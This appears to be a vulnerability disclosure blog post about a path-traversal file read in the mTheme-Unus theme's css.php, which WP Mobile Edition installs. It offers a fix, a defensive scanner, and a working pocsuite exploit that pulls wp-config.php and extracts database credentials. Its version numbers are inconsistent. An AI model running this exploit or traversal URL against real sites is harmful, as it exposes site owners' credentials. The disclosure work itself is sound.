Impact:

  • WP Mobile Edition versions below 2.2.7 carry this vulnerability.
  • Once the WP Mobile Edition plugin has been activated, the vulnerability persists even if the plugin is later deactivated or deleted.
  • Upgrading the plugin does not help either: if a vulnerable version was ever activated, the vulnerable file is still there.
  • css.php, which concatenates and compresses CSS files, is not specific to this plugin; it is open-source code from https://github.com/mrclay/, and any site that uses this file is affected as well.

Details

Plugin download: https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip

When the plugin is activated for the first time it automatically installs a theme, mTheme-Unus. The file css/css.php in that theme allows arbitrary files to be read.
Vulnerable code (the tail of css.php; the earlier part that fills $files from the request is not reproduced here):

// $files is the list of paths derived from the ?files= request parameter and
// $cachePath the cache directory; both are set earlier in css.php (not
// reproduced in the post). Nothing below restricts where $file may point.
foreach ($files as $file)
{
    $content .= file_get_contents($file);
}

// Remove comments
$content = preg_replace('!/\*[^*]*\*+([^/][^*]*\*+)*/!', '', $content);

// Remove tabs, spaces, newlines, etc...
$content = str_replace(array("\r", "\n", "\t", ' ', ' '), '', $content);

// Delete cache files older than an hour
$oldDate = time()-3600;
$cachedFiles = scandir($cachePath);
foreach ($cachedFiles as $file)
{
    $filemtime = @filemtime($cachePath.$file);
    if (strlen($file) == 32 and ($filemtime === false or $filemtime < $oldDate))
    {
        unlink($cachePath.$file);
    }
}

// Write cache file
file_put_contents($cachePath.$md5, $content);

// Output
echo $content;


file_get_contents() reads whatever path each entry of $files points to, the results are concatenated and echoed, so any file the web server process can read (wp-config.php included) is returned to the client. The comment and whitespace stripping on the way out mangles the output a little but does not hide credentials.
Deleting, updating or deactivating the plugin does not touch this file, because it lives in the installed theme rather than in the plugin directory.

Proof of vulnerability:

Update the plugin to version 2.8.

Visit: website/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

The vulnerability is still there.

Fix recommendation:

Delete the file wp-content/themes/mTheme-Unus/css/css.php.
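Because the file survives plugin removal and the same combiner code shows up outside this plugin, a check that walks the whole docroot is more useful than looking at the one known path. The following Python scanner is an added example written for this post, not code from the plugin, the theme or pocsuite: it flags the known path and any other .php file carrying two lines from the snippet above (the scandir()/file_put_contents() cache handling), and uses a constructed sample tree in a temporary directory in place of a real WordPress install.

```python
import os
import tempfile

# Path the post names; relative to the WordPress docroot.
KNOWN_PATH = os.path.join('wp-content', 'themes', 'mTheme-Unus', 'css', 'css.php')

# Lines taken from the vulnerable css.php shown in the post. A copy of the same
# combiner dropped under another theme or plugin carries them as well.
SIGNATURES = (
    "file_put_contents($cachePath.$md5, $content);",
    "$cachedFiles = scandir($cachePath);",
)


def is_css_combiner(path):
    """True if the file contains every signature line of the combiner."""
    try:
        with open(path, 'r', encoding='utf-8', errors='ignore') as fh:
            text = fh.read()
    except OSError:
        return False
    return all(sig in text for sig in SIGNATURES)


def find_css_combiners(docroot):
    """Walk docroot and return docroot-relative paths of suspect .php files."""
    hits = []
    for dirpath, _dirs, files in os.walk(docroot):
        for name in files:
            if not name.endswith('.php'):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, docroot)
            # the known location is reported even if its body was already emptied
            if rel == KNOWN_PATH or is_css_combiner(full):
                hits.append(rel.replace(os.sep, '/'))
    return sorted(hits)


# Constructed stand-in for a second copy of the combiner (hypothetical file).
SAMPLE_COMBINER = """<?php
// trimmed stand-in; only the signature lines matter for the scanner
$cachedFiles = scandir($cachePath);
file_put_contents($cachePath.$md5, $content);
echo $content;
"""


def build_sample_docroot(root):
    """Write a constructed docroot: the known file, a renamed copy, and noise."""
    layout = {
        KNOWN_PATH.replace(os.sep, '/'): "<?php // body irrelevant, path alone is enough\n",
        'wp-content/themes/other-theme/inc/combine.php': SAMPLE_COMBINER,
        'wp-content/themes/other-theme/style.css': "body{margin:0}\n",
        'wp-content/plugins/some-plugin/plugin.php': "<?php // harmless\n",
    }
    for rel, body in layout.items():
        full = os.path.join(root, *rel.split('/'))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, 'w', encoding='utf-8') as fh:
            fh.write(body)


def demo():
    """Build the sample tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_docroot(root)
        return find_css_combiners(root)


if __name__ == '__main__':
    for hit in demo():
        print('found css combiner:', hit)
```

Against a live install call find_css_combiners('/var/www/html') (or wherever the docroot is); anything it reports should be deleted, or at least blocked at the web server, until it has been confirmed that the copy restricts $files to the theme's own CSS.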

POC&EXP:

Note: based on pocsuite

#!/usr/bin/env python
# -*- coding:utf-8 -*-

from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = ''
    version = '1'
    author = ['nearg1e']
    vulDate = '2015-10-10'
    createDate = '2015-10-10'
    references = ['']
    name = 'WordPress WP Mobile Edition Plugin 2.2.7 /wp-content/themes/mTheme-Unus/css/css.php file download'
    appPowerLink = 'https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip'
    appName = 'WordPress WP Mobile Edition Plugin'
    appVersion = '2.2.7'
    vulType = 'Local File Inclusion'
    desc = '''file_get_contents() reads the path in $file and the result is echoed, which causes the vulnerability.'''
    samples = []

    def _attack(self):
        import re
        result = {}
        exp_url = '%swp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php' % self.url
        try:
            requ = req.get(exp_url, timeout=10).content
        except Exception as e:
            self.result.error = str(e)
            return
        # css.php strips comments and all whitespace before echoing, so the
        # response is one long line with no space after the comma. Allow
        # optional whitespace and stop each capture at the closing quote;
        # a greedy (.*) would run on to the last '); in the file.
        re_str = r"define\('DB_USER',\s*'([^']*)'\);[\s\S]*?define\('DB_PASSWORD',\s*'([^']*)'\);"
        re_result = re.findall(re_str, requ)
        if re_result:
            result['DB_USER'] = re_result[0][0]
            result['DB_PASSWORD'] = re_result[0][1]
        return self.parse_attack(result)

    def _verify(self, verify=True):
        result = {}
        vul_url = '%swp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php' % self.url
        response = req.get(vul_url, timeout=10).content
        # the marker has no space before the comma, so it survives the stripping
        if 'define(\'WP_DEBUG\'' in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('failed')
        return output


register(TestPOC)

PoC run result:

All content on this blog is for security research only; do not use it for malicious attacks.
Original URL: "https://blog.neargle.com/2015/10/10/wp-mobile-edition-pn-cssphp-arbitrary-flie-dl/index.html"